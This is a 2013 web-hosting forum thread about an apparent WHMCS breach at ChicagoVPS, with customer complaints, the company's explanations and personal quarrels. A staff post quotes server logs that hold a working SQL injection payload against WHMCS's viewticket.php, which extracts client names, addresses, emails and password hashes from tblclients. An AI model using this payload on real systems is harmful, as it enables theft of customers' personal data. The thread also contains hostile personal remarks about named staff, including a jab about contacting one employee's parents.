# ChicagoVPS global password reset? Hacked again?



## MannDude (Oct 19, 2013)

Following a lead in IRC, I browse over to LET and see this thread: http://lowendtalk.com/discussion/15185/global-chicagovps-password-reset

Anyone else get this? Curious if it was 'precautionary' or if they were victim of the new WHMCS exploit?

*EDIT:* Actually, it sounds like they were indeed hacked again. Can't really blame them this time, and at least they reset passwords instead of leaving customers hanging.... But yeah.


[7:52:34 PM] they were displaying empty DB tables when I learned about the exploit
[7:53:26 PM] when you visited their billing it listed the names of the tables in whmcs sql
[7:53:37 PM] then it was down less then 5 minutes later
[7:55:02 PM] So yes they got hacked

Curious to see what CVPS has to say.


----------



## Amitz (Oct 19, 2013)

Damn. I just lost a bet. I was sure that drmike would open this thread right after I saw the discussion on LET...


----------



## texteditor (Oct 19, 2013)

I don't think it is out of the realm of possibility that ChicagoVPS could be a victim of an unpatched exploit


----------



## MannDude (Oct 19, 2013)

Even doctors have to sleep from time to time.


----------



## Lee (Oct 19, 2013)

I never got anything, but I am not an active customer, so perhaps it was only sent to those that are.


----------



## MannDude (Oct 19, 2013)

~Lee~ said:


> I never got anything, but I am not an active customer, so perhaps it was only sent to those that are.


To be fair, in IRC someone said they're not a CVPS customer and haven't been one in a while... yet they still got a password reset. Your email may be in queue.

Someone said that when you visited their billing it listed the names of the WHMCS tables and then 5 minutes later was offline... So, yes, it sounds like they got hacked again.

At least they reset the passwords this time.


----------



## Amitz (Oct 19, 2013)

MannDude said:


> Even doctors have to sleep from time to time.


Jaja...  Dr. Jekyll and Mr. Manndude... Now I know why drmike uses that "we" so often when it should be an "I". You are the same person!


----------



## MannDude (Oct 19, 2013)

Amitz said:


> Jaja...  Dr. Jekyll and Mr. Manndude... Now I know why drmike uses that "we" so often when it should be an "I". You are the same person!


Caught me/us! I sporadically type to myself between my laptop and desktop and respond to threads that way too!  /s

Sarcasm = purple, btw.


----------



## SkylarM (Oct 19, 2013)

MannDude said:


> Caught me/us! I sporadically type to myself between my laptop and desktop and respond to threads that way too!  /s
> 
> Sarcasm = purple, btw.


I'm colorblind so none of this was sarcasm! Mwahahahah(notethiswasajoke)


----------



## GIANT_CRAB (Oct 19, 2013)

Not hacked but script kiddie'd by someone who downloaded that script.


----------



## MannDude (Oct 19, 2013)

GIANT_CRAB said:


> Not hacked but script kiddie'd by someone who downloaded that script.


True, true. Unless the owner of localhost.re tests his exploits in real world environments before releasing them... Or maybe someone kid just got to it before they locked it down?

WHMCS really needs to start implementing notices in their admin panel.


----------



## WebSearchingPro (Oct 19, 2013)

MannDude said:


> Caught me/us! I sporadically type to myself between my laptop and desktop and respond to threads that way too!  /s
> 
> Sarcasm = purple, btw.


Thats more of a fuchsia

Edit: I lied, the exact color is "Dark Magenta"


----------



## DalComp (Oct 19, 2013)

I have 2 account with them, 1 active and 1 inactive. Both passwords are not reset, I can login with the usual password.


----------



## wlanboy (Oct 19, 2013)

DalComp said:


> I have 2 account with them, 1 active and 1 inactive. Both passwords are not reset, I can login with the usual password.


Maybe the reset is on queue too.


----------



## drmike (Oct 20, 2013)

MannDude is a different person than I am.  I guarantee that.

I was enjoying some shut eye (sleep).  Been a tad under the weather for past few days.  That happens with weeks on end of mass stress and lack of sleep.  No worries, I'll be back up to spec in a few days 

As for CVPS, ahhh, NOT AGAIN!  Anyone sticking with them deserves whatever befalls you as a customer.  I'll ride the high road on this... CVPS is a big VPS provider  with an even bigger mouth in charge.  So attacking them like this is a popularity type thing (high value target).  It is just going to keep happening unless they fail or invest properly.

CVPS needs to stop being ran like a cheapskate in charge self siphoning money for personal goodies and expand properly --- hire real staff, hire someone qualified for hardening, auditing and similar.    No company with 9k containers+ should be ran by 2-4 people with questionable backgrounds/knowledge.   Just not enough hours in the day to support customers and do what needs to be done.


----------



## sv01 (Oct 20, 2013)

I'm sure they won't comment  about this hack (again)


----------



## lifetalk (Oct 20, 2013)

The only way I can think of to get notified, right now at least, is to setup alert words on WHT for 'whmcs'. Have an email app on a smartphone that buzzes you and goes haywire whenever you get an email from WHT.

Granted there's going to be more false alarms than there will be actual notices of a new WHMCS exploit... but that's a tradeoff I guess.


OR, just subscribe to local's blog rss.


----------



## Lee (Oct 20, 2013)

drmike said:


> MannDude is a different person than I am.  I guarantee that.
> 
> I was enjoying some shut eye (sleep).  Been a tad under the weather for past few days.  That happens with weeks on end of mass stress and lack of sleep.  No worries, I'll be back up to spec in a few days
> 
> ...


I still doubt that Chris is actually anything more than a mule, granted not a very useful mule.  A mule that JB can control easily to front another of his operations and keep his mouth shut about what really happens.

The top line income is relatively low and I would be surprised if Chris get's much of a salary hence he still needs to continue working at a department store.

Even giving the benefit of the doubt and saying they average $15 per month on average per customer (9,000) you are not going to have much change left out of that $135,000 once the basics get paid.


----------



## MannDude (Oct 20, 2013)

Has anyone heard from Fabozzi today? Him and Biloh have been quiet on LET. It's like they went and took a trip or something and noped out.


----------



## Aldryic C'boas (Oct 20, 2013)

At this point, the only thing surprising is that folks are still surprised when CC gets reamed like this.


----------



## CVPS_Chris (Oct 20, 2013)

Hey guys, making a post regarding what happened since I dont like the stupidity over here:

Our logs indicate that an individual may have ran the whmcs2.py script on our WHMCS install. One of our employees acted immediately when it came to our attention that there was a new WHMCS exploit available. After an evaluation of our logs, we have identified that about 3% of our customers were affected and we've went ahead and issued a password reset to those customers to be on the safe side. The customers that were affected were legacy customers, meaning that  high percentage were inactive clients.

We issued a partial password reset towards the 3% of customers that may have been affected by this WHMCS exploit. If you received a password reset email and you did not request one, you were possibly affected, and your password was reset for your safety. While passwords are encrypted, we do not want to take any chances when it comes to the security of our customers. The only information that possibly was accessed by a third party for the 3% of customers impacted were the following: clientid, name, address, email address, encrypted password. No VPS service details or credit card information was accessed in any way.

We have already patched our WHMCS installation, and have adjusted our security settings to make it harder for exploits in general to be ran. One of the measures we took to further enhance security was doing a complete overhaul on our modsecurity rules on the billing server.

An email is currently going out to the clients that were affected explaining the situation.

Regards

Chris


----------



## CVPS_Chris (Oct 20, 2013)

MannDude said:


> Following a lead in IRC, I browse over to LET and see this thread: http://lowendtalk.com/discussion/15185/global-chicagovps-password-reset
> 
> Anyone else get this? Curious if it was 'precautionary' or if they were victim of the new WHMCS exploit?
> 
> ...


Manndude, I request you please revise your post as it is innaccurate.

The above is not true, may I know who said this? The exploit doesn't work that way and doesn't let you change the website. It sounds like someone is just trying to stir the pot.


----------



## drmike (Oct 20, 2013)

CVPS_Chris said:


> Hey guys, making a post regarding what happened since I dont like the stupidity over here:


Come on, you just aren't allowed over here.   That's the Biloh-way.   How many people, other providers has he warned with stern language about posting over here?

I stopped counting how many times ChicagoVPS has been hacked.   Sorry, my ADD is waning with you Chris.   Is this the fourth time?

The big $100 question is did CVPS' database get dumped again?

You folks ought to invest in your own panel.


----------



## drmike (Oct 20, 2013)

Hey CVPS_Chris,  no offense fellow, but I posted this 10 days ago...

You folks might want to get up to speed and to work:

http://vpsboard.com/topic/2211-large-hacked-hosting-companies-violating-california-law-and-new-york-law/


----------



## Reece-DM (Oct 20, 2013)

drmike said:


> Come on, you just aren't allowed over here.   That's the Biloh-way.   How many people, other providers has he warned with stern language about posting over here?
> 
> I stopped counting how many times ChicagoVPS has been hacked.   Sorry, my ADD is waning with you Chris.   Is this the fourth time?
> 
> ...


Chances are it all got dumped, I can't see just 3% being "Reset" the script would of pulled all of the info out, in a not so slow manner either. infact the extraction process on it was quick from my testing.. on myself might I add.



> The above is not true, may I know who said this? The exploit doesn't work that way and doesn't let you change the website. It sounds like someone is just trying to stir the pot.


From what I heard (I'm not to good with Python) but a php file can be written to as well if there is the right permissions to do it. The script is apparently able to do this.

Without the bitching going on @DrMike -- Good on you Chris for following up the post here to bad it happened to you again that does suck. :lol: but it can happen to anyone, I'm sure there is a few providers hit whom are not even aware of it. Atleast you guys took swift action I guess.


----------



## drmike (Oct 20, 2013)

This is why Reece, I stand by not using popular software or popular anything...  High value target when every Tom, Dick and Harry out there using the same basket of mal-ware   One vulnerability and wrecks masses.

Folks better start being less high profile (CVPS) and more anonymous about software (dev. your own or support such).

I think this hack and what is able to be done is far worse than anyone is saying.  Expect to see mass issues this upcoming week and mighty big data-derived problems.


----------



## DomainBop (Oct 20, 2013)

I posted my thoughts here http://lowendtalk.com/discussion/comment/353151/#Comment_353151


----------



## SPINIKR-RO (Oct 20, 2013)

Just curious, not trying to 'stir the pot' - How does only %3 get dumped?


----------



## rds100 (Oct 20, 2013)

Perhaps by limiting the response body size or something? Who knows.


----------



## Lee (Oct 20, 2013)

One thing is for sure, when there is an exploit like this CVPS always seems to be a target and their slow response times catch them out.


----------



## CVPS_Chris (Oct 20, 2013)

For the doubters out there, it was only 3% of the customers most of which were inactive.

"We have extensive logging set up on our infrastructure and log all of the POST data. All logs are not logged on our own servers, they are sent in real time to an offsite datacenter. That is how we were able to determine exactly how many were affected, and we wrote a script to only reset and email the 3% impacted."

We cought the script in the act and shut down WHMCS immediatly and it only got the first 3%. I will no longer reply to this as we are being "transparent" like you always asked.


----------



## jarland (Oct 20, 2013)

Like them or not, gotta feel a little bad for CVPS on these matters. You know they get hit with these exploits long before most hosts in their markets even hear about the reports. Starting to think it'd be worthwhile for CVPS to develop in house solutions to break the cycle of "new exploit in generic software, let's hit CVPS!"


----------



## MannDude (Oct 20, 2013)

CVPS_Chris said:


> For the doubters out there, it was only 3% of the customers most of which were inactive.
> 
> "We have extensive logging set up on our infrastructure and log all of the POST data. All logs are not logged on our own servers, they are sent in real time to an offsite datacenter. That is how we were able to determine exactly how many were affected, and we wrote a script to only reset and email the 3% impacted."
> 
> We cought the script in the act and shut down WHMCS immediatly and it only got the first 3%. I will no longer reply to this as we are being "transparent" like you always asked.


That's good news, and good to hear. Glad to see that you've learned from past mistakes and have taken action to ensure that your customer's data hasn't been compromised again.

Cheers and good luck.


----------



## jarland (Oct 20, 2013)

CVPS_Chris said:


> For the doubters out there, it was only 3% of the customers most of which were inactive.
> 
> "We have extensive logging set up on our infrastructure and log all of the POST data. All logs are not logged on our own servers, they are sent in real time to an offsite datacenter. That is how we were able to determine exactly how many were affected, and we wrote a script to only reset and email the 3% impacted."
> 
> We cought the script in the act and shut down WHMCS immediatly and it only got the first 3%. I will no longer reply to this as we are being "transparent" like you always asked.


Props for the straight forward detail.


----------



## Jack (Oct 20, 2013)

SPINIKR-RO said:


> Just curious, not trying to 'stir the pot' - How does only %3 get dumped?














60k clients is quite a lot..


----------



## MannDude (Oct 20, 2013)

Jack said:


> 60k clients is quite a lot..


Haha... yeah. They most certainly do not have 60K clients total. No way is 3% of their client base = to 60K.


----------



## bdtech (Oct 20, 2013)

There's zero way you can be sure they only got 3 percent? No logs would give you enough info


----------



## lbft (Oct 20, 2013)

jarland said:


> Like them or not, gotta feel a little bad for CVPS on these matters.


Why? Chris created this situation by pissing off half the internet, now he's got to live with it.

My only sympathy is with the people who had their personally identifiable information leaked.


----------



## tchen (Oct 20, 2013)

bdtech said:


> There's zero way you can be sure they only got 3 percent? No logs would give you enough info


The sql injection contains the userid requested. Which increments toward total rows. That said, each row could be an active user, a lapsed client, or even a fraud-locked one. I wouldn't put it past them to have accumulated so much debris in their system to have such a high 'client' count.


----------



## CVPS_Adam (Oct 20, 2013)

bdtech said:


> There's zero way you can be sure they only got 3 percent? No logs would give you enough info



Hi Bdtech,


This is Adam from ChicagoVPS. Below is what the security firm who setup our logging, helped us with modsecurity and so forth had to say about this.


"We set up logging for ChicagoVPS a couple of months ago, including writing a custom module for Apache that sends all POST data to our own log server. All kinds of logs are sent in real time, so that way we can go back and look at the logs if anything occurs."


"This is what we got in the POST data right before the server was taken into maintenance mode. For example, If you install an unsecured WHMCS and run the exploit against yourself and log the POST data, this is exactly what you would see:


"Location: POST /viewticket.php
Client IP: 209.59.131.87:53212
HTTPd Timestamp: 1382122285
Content-Length: 256
Content-Type: application/x-www-form-urlencoded
Host: billing.chicagovps.net
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 386,1),0,0,0,0,0,0,0,0,0,0,0#"

"Location: POST /viewticket.php
Client IP: 209.59.131.87:53218
HTTPd Timestamp: 1382122286
Content-Length: 256
Content-Type: application/x-www-form-urlencoded
Host: billing.chicagovps.net
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 387,1),0,0,0,0,0,0,0,0,0,0,0#"

"Location: POST /viewticket.php
Client IP: 209.59.131.87:53225
HTTPd Timestamp: 1382122287
Content-Length: 256
Content-Type: application/x-www-form-urlencoded
Host: billing.chicagovps.net
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
PostData: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT 388,1),0,0,0,0,0,0,0,0,0,0,0#"


"So the last client obtained was the 388th person from the top of the table. So the exploit (whmcs2.py) as written doesn't do a full dump of the database all at once, but one user at a time. Since it only pulls one user at a time, by looking at the POST data - we can tell the last user that was pulled. Then all we had to do was to walk through the same users that were affected, put their ID's in a separate file, then do a mass password reset. I confirmed the exploit by running the exploit against the server and that it was in fact pulling data one by one."


"Lucky for all of us, one of the employees found out about the exploit and put the database into maintenance mode and contacted us. I then proceed to take the billing website fully offline in case the exploit still worked in maintenance mode, even though no data would be passed back. Afterwards, we went over and updated modsecurity rules so that tbladmins, tblclients and other tables cannot be specified in a POST. If you doubt this, try submitting a ticket using one of those key words (not giving you the full list here) - and see what happens. In addition to this, we identified the people who were affected and did a mass password reset."


"Bottom line, always send your logs off to a remote server. And most exploits use http POST, so always log all the POST data. It's a good indication if somebody is trying to break in, or if they already did, to be able to assess how much damage they did and to find ways to update your security."


"I understand that the latest rash of WHMCS and SolusVM exploits have rattled many people, and I join you in wondering what those programmers are doing with our hard-earned money while allowing other people to exploit our providers and end up affecting us as the customer. But do not confuse fact with fiction, as there are companies that are actually trying to improve and do better."


----------



## jarland (Oct 20, 2013)

Credit where it's due. It's not that it's particularly difficult stuff it's that the gap between those that talk about it and those that do it is usually a bit wide. Sending post data off server is simple in nature but pure brilliance when the moment arises.


----------



## bdtech (Oct 21, 2013)

@CVPS_Adam thanks for the detail. So you send all post data offsite to a third party including usernames, passwords, and personally identifiable information?


----------



## lbft (Oct 21, 2013)

Does ChicagoVPS take direct credit cards?


----------



## DomainBop (Oct 21, 2013)

lbft said:


> Does ChicagoVPS take direct credit cards?


Yes they do, and unlike other providers who accept credit cards through WHMCS they don't provide any way for customers to delete the credit card info that is stored on file (the only option is to update the card info),  Type of card, credit card number, and expiration date are stored.

WHMCS documentation:



> *Merchant Gateways* store credit card information securely in the WHMCS database


When I canceled my CVPS services I had my credit card company cancel my card because A. I didn't want my card info stored with a company that has been hacked multiple times in just the past year, and B. for some reason I don't trust CVPS (it's kind of hard to trust a company when their owner has been caught lying multiple times and one of their employees CVPS_Adam is a teenager who lives at home with his parents and has trouble remembering his own name (is it Adam Ng or Kevein Hillstand today) or where he lives (is it California or New York today).


----------



## drmike (Oct 21, 2013)

And that Adam Ng / Kevin Hillstrand is a  HackForums skid....  Bought any booters lately?  How about Netflix accounts?

Those skids, don't they know the feds are port mirroring HF traffic?


----------



## CVPS_Adam (Oct 21, 2013)

Hi pubcrawler / buffalooed / drmike / elrooted / CodyRo,

I'm afraid you're ill-informed, while I did have an account registered at HackForums over 1-2 years ago, it was for purposes of my previous employer and was not used unethically. I sold my account quite some time ago and do not associate myself with it. 

Thanks


----------



## Amitz (Oct 21, 2013)

Hi CVPS_Adam!

How are your parents doing? I am already very much looking forward to my next USA trip to get to know them and to talk with them about their son, his character disorder and what he does on the Internet since some time. That will be around November/December and surely big fun! Will they care at all? We will see. 

Take care,

A

P.S.: This is - of course - no threat. You surely do not fear a simple conversation with Mama and Papa, do you?


----------



## Lee (Oct 21, 2013)

drmike said:


> And that Adam Ng / Kevin Hillstrand is a  HackForums skid....  Bought any booters lately?  How about Netflix accounts?
> 
> Those skids, don't they know the feds are port mirroring HF traffic?


No you are wrong, I just checked old LET threads and CVPS_Chris said he seen all Kevin's Documents and had his social security number in that name, so Adam and Kevin can't be the same person because Chris would never lie about anything.

So lay off Jake, I mean Adam.


----------



## CVPS_Adam (Oct 21, 2013)

DomainBop said:


> CVPS_Adam is a teenager who lives at home with his parents and has trouble remembering his own name (is it Adam Ng or Kevein Hillstand today) or where he lives (is it California or New York today).


Hey, didn't you live with your parents before you graduated?  I'm sure that we all did haha. I'm very blessed and lucky to have the financial ability to move out and afford my own place at such a young age. I've been living in socal (Pasadena) for the better part of the month now, I'm about to drive back there tonight to finish moving the remainder of my stuff.

I feel very special to be the center of attention here   Back on topic, if anyone has any additional questions or concerns regarding the password resets please email us at [email protected] Thanks guys!!


----------



## Amitz (Oct 21, 2013)

CVPS_Adam said:


> I feel very special to be the center of attention here


Obviously, you spent too much time with Dick Fabozzi already. Note to yourself: "It is not good to be in the center of NEGATIVE attention". A lesson you and the other Colocrossing Boys really have to learn. But read my words: "It all comes back to you".


----------



## CVPS_Chris (Oct 21, 2013)

Amitz,

Your English is terrible, and your points have no basis to them. Leave Adam alone, its not a crime to want to have an alias on the internet. 99% of the people here are under an alias and want to keep it that way including yourself.

If you want to meet anyone come meet me, I will take you and anyone out for a nice lunch and you can see we are not the people you so call "claim" we are. Grow up and move on. Don't expect a response from either of us as we have made the necessary response to the topic of the thread.


----------



## MCH-Phil (Oct 21, 2013)

CVPS_Chris said:


> If you want to meet anyone come meet me, I will take you and anyone out for a nice lunch and you can see we are not the people you so call "claim" we are. Grow up and move on. Don't expect a response from either of us as we have made the necessary response to the topic of the thread.


I might take you up on that.  This mysterious lunch seems to be the only way your willing to refund people for your screwups.  LOL


----------



## Jack (Oct 21, 2013)

CVPS_Chris said:


> Amitz,
> 
> 
> Your English is terrible, and your points have no basis to them. Leave Adam alone, its not a crime to want to have an alias on the internet. 99% of the people here are under an alias and want to keep it that way including yourself.
> ...


Chris,

Your Math is terrible.


----------



## Amitz (Oct 21, 2013)

CVPS_Chris said:


> Amitz,
> 
> 
> Your English is terrible, and your points have no basis to them. Leave Adam alone, its not a crime to want to have an alias on the internet. 99% of the people here are under an alias and want to keep it that way including yourself.
> ...


Please accept my apologies for my English: I am not a native speaker and already try my best.


----------



## drmike (Oct 21, 2013)

Problem isn't people being anonymous online.  I fully support that.  If you want anonymous staff well fine.  Adam N, Chris F,  Jon B, Alex V.  That's how stable companies do things. 

Problem is a company fabricating humans.  Why?  To hide their former misdeeds/hosting fails.  Why else?  To hide the fact they are a minor aka underage.  In fairness, you inherited, bought out, hired, whatever the Hillstrand creation. But Adam was like 14-15 during some of the prior endeavors.   Gets into shady territory about adults and corruption of minors.

The Kevin/Adam thing is legendary.  Tons of stories about that pursuit and even Fabozzi himself claiming he had legal papers indicating Kevin was indeed Kevin.    But you folks never lie and integrity has always been there 

I won't go on about the HF stuff though.   I've only been screen capped or referenced by others to the info.  The 1Gbps booter stuff... Tisk tisk.  Could I be wrong?   Ahh, usually am not.

You folks still fond of TV?  Maybe I can watch along on how the pros roll.


----------



## MannDude (Oct 21, 2013)

Amitz said:


> Please accept my apologies for my English: I am not a native speaker and already try my best.


You shouldn't have to apologize for your English. Chris is just trying to be mean and exert some level of dominance over you. For what it's worth, your English is just fine. I've seen how Fabozzi has responded to tickets in the past and you should be happy to know I find your English better than some responses I've seen him make.


----------



## drmike (Oct 21, 2013)

Now since we are discovering here and implicating folks of old,

Sturlaugur Olafsson  

Why would an Asian boy be having customers make payment to uncle Olaffson on behalf of his former employee?


----------



## MannDude (Oct 21, 2013)

drmike said:


> Now since we are discovering here and implicating folks of old,
> 
> Sturlaugur Olafsson
> 
> Why would an Asian boy be having customers make payment to uncle Olaffson on behalf of his former employee?


Whats this all about? The name sounds familiar but I can't pinpoint why or where I've seen or heard it before.


----------



## drmike (Oct 21, 2013)

That name was fed to me from an old URPad customer.

Story as it goes is that Adam/Kevin sent message about URPad accepting PayPal under some limited arrangement.  Believe the customer was overdue on invoice or just had funds in PayPal.  For some reason URPad did not accept PayPal.  

Sturlaugur Olafsson  is an old Icelandic name.  Relationship to these folks... ahh well, none apparent.   But, I did note someone mentioned Adam posting on HF also for swap of PayPal accounts for other accounts. 

Mann, did URPad have PayPal drama / not accepted when you worked there?


----------



## MannDude (Oct 21, 2013)

drmike said:


> That name was fed to me from an old URPad customer.
> 
> Story as it goes is that Adam/Kevin sent message about URPad accepting PayPal under some limited arrangement.  Believe the customer was overdue on invoice or just had funds in PayPal.  For some reason URPad did not accept PayPal.
> 
> ...


Oh, yeah... I remember now. I knew the name looked familar.

Yeah, URPad didn't accept PayPal direct... I don't think any of us had access to that PP account to check, but that does indeed sound familiar and random folks would ticket us and say they paid via PP to that account even though they were supposed to be paying via 2CO.


----------



## drmike (Oct 21, 2013)

MannDude said:


> Yeah, URPad didn't accept PayPal direct... I don't think any of us had access to that PP account to check, but that does indeed sound familiar and random folks would ticket us and say they paid via PP to that account even though they were supposed to be paying via 2CO.


Oh freaking boy.  When I see a circa 1700's sounding name I make mental note.


----------



## lbft (Oct 21, 2013)

MCH-Phil said:


> I might take you up on that.  This mysterious lunch seems to be the only way your willing to refund people for your screwups.  LOL


He can't issue refunds, he'd have to take extra shifts at Kohl's to cover the cost.


----------



## MannDude (Oct 21, 2013)

lbft said:


> He can't issue refunds, he'd have to take extra shifts at Kohl's to cover the cost.


In the past hasn't Fabozzi told customers to do a PayPal dispute if they felt they deserved refunds? I think this is because he always fights it. Either way, if you are entitled to a refund and they don't want to give you one, issue a dispute.

Or open a BBB dispute http://www.bbb.org/upstate-new-york/business-reviews/internet-web-hosting/chicagovps-in-clarence-ctr-ny-235967102


----------



## MCH-Phil (Oct 21, 2013)

MannDude said:


> In the past hasn't Fabozzi told customers to do a PayPal dispute if they felt they deserved refunds? I think this is because he always fights it. Either way, if you are entitled to a refund and they don't want to give you one, issue a dispute.
> 
> Or open a BBB dispute http://www.bbb.org/upstate-new-york/business-reviews/internet-web-hosting/chicagovps-in-clarence-ctr-ny-235967102



Paypal will ALWAYS side with the host...  Paypal does not protect the buyer if they are purchasing a digital item.


----------



## Amitz (Oct 22, 2013)

MannDude said:


> You shouldn't have to apologize for your English. Chris is just trying to be mean and exert some level of dominance over you. For what it's worth, your English is just fine. I've seen how Fabozzi has responded to tickets in the past and you should be happy to know I find your English better than some responses I've seen him make.


Thank you very much for cheering me up and your kindness concerning my (surely mediocre) english. It will, however, be tough for Chris Fabozzi to exert any level of dominance over me. I am twice his age, running a company with 2 centuries of presence in its market (obviously not hosting related), never lied to my customers and all my employees operate under their real name and identity when interacting with clients. We are a very traditional company and I simply cannot stand people like the whole ColoCrossing bunch with their questionable business ethics. I should not have called "Chris Fabozzi" "Dick Fabozzi". That was indeed childish and I take that back. It just makes me angry to see people get through with a bunch of lies while others work hard to do the right thing. I know that life is not fair but I really hope that doing business this way leads to no good.


----------

